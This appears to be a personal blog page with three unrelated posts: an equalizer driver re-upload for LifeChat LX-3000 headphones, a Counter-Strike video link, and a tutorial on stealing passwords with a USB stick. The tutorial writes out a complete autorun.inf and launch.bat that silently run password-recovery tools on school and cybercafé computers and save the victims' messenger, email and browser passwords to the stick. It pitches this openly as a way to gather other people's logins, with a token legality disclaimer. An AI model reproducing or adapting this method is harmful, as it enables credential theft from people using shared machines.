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Microsoft Lifechat LX-3000: Equalizer & enhancements

I have Microsoft LifeChat LX-3000 USB headphones and I love them, but it disappointed me a bit they didn't come with an equalizer to adjust sound.
A few months ago I did some searching and found nice equalizer compatible with Vista and 7 (doesn't work on XP, damn it... :[), so I grabbed my Windows 7 computer immediately and downloaded it. Extremely satisfied, works perfectly!
Today I searched again for the equalizer, found it on the same place but the link there was broken, but I was lucky since I still have it here on the hard drive, so I decided to re-upload it for all other users of the same headphones to enjoy :).



Features

  • Loudness Equalization
  • Equalizer
  • Environment modeling
  • Room correction

Compatibility

  • Windows Vista (32-bit and 64-bit)
  • Windows 7 (32-bit and 64-bit)

Notes

  • It is recommended to create a folder somewhere (Program Files or Documents) and save the downloaded files in it.
  • To install, run Setup.exe and follow the instructions.
  • To uninstall, run Uninst.exe.

Screenshots



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Credits

Daniel_K (daniel_san) - creator of the driver.
hardMOB - forum where this was exclusively released to.

C-NOTE: The legendary Counter-Strike player

I haven't laughed so hard for 20 minutes straight until I watched this video.
So if you have some free time, put the video on fullscreen and HD (so you can read the chat) and enjoy.

Autorun pendrive keylogger tutorial

Here's my first computer-related tutorial which might be interesting for some, but most of you probably know this or heard about it.

Do you have access to your school's or local LAN house/cybercafé computers that are used by dozens of people? Imagine if you could gather all information (logins, historic, etc.) from them to your pendrive quickly? Well, that's easy and simple. You only need a few simple keyloggers and text files in your pendrive, which I'll explain below.

Tools

► Keylogger(s)

There are many keyloggers on the internet. A keylogger is a small app that gathers stuff such as passwords to yourself. In this tutorial I'll be using 5 simple ones, but you can use even others such as Ardamax Keylogger or Micro Keylogger.
  • MessenPass: gets passwords from MSN/Windows Messenger, Yahoo! Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, GAIM, etc.
  • Mail PassView: gets passwords from Outlook Express, Microsoft Outlook 2000, Microsoft Outlook 2002/2003, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail, etc. Mail PassView can also get passwords of web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
  • IE PassView: assuming the people that use the computers are noobs (only noobs use IE), this gets passwords from Internet Explorer, from version 4.0 to 7.0 (unsure about new ones).
  • Protected Storage PassView: gets all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
  • PasswordFox: gets passwords from Firefox.
You can download a pack with these tools without any viruses (tested myself, antivirus identified it as a HackTool - that's not a virus) by clicking here (courtesy of UnEtHacking).

Procedure

1. Download the pack (link above).
2. Extract all the .exe files to your pen-drive (don't simply put the ZIP folders there, you need to open them and copy the files inside to the pen).
3. Create a new text file called autorun.inf. Paste this in it:
[autorun]
open=launch.bat
ACTION= Autorun pen-drive.

(you can change the text in ACTION= to whatever you want)
Don't forget that the file must be .inf, NOT .txt!
4. Make another text file called launch.bat. Pate this in it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
If you have more keyloggers, follow the same pattern
start KEYLOGGERNAME.exe /stext KEYLOGGERNAME.txt
Once again, don't forget the file must be .bat, NOT .txt!
5. Put all these files inside your pen-drive.


Make sure you have the following files in your pen-drive:
  • autorun.inf
  • launch.bat
  • mspass.exe
  • mailpv.exe
  • iepv.exe
  • iepv_sites.txt (you can add sites here for the program to try to catch passwords from)
  • pspv.exe
  • passwordfox.exe
  • Any other keylogger you might have added (obviously optional)


And there you have it! Now go put your pen-drive in other computers and double-click the launch.bat file you made (although you probably don't have to do this, because most computers will read the autorun.bat file, but still, you never know).
Then multiple text files will be made with all passwords the keyloggers catched in them!

    As far as I know, this works in Windows 2000, XP, Vista and 7. Not sure about 8.

    Note: this tutorial is not illegal, as it can be used for good causes such as getting passwords from your own PC after other people have been using it, for monitoring. It's the sole responsibility of the user that uses this method for illicit things.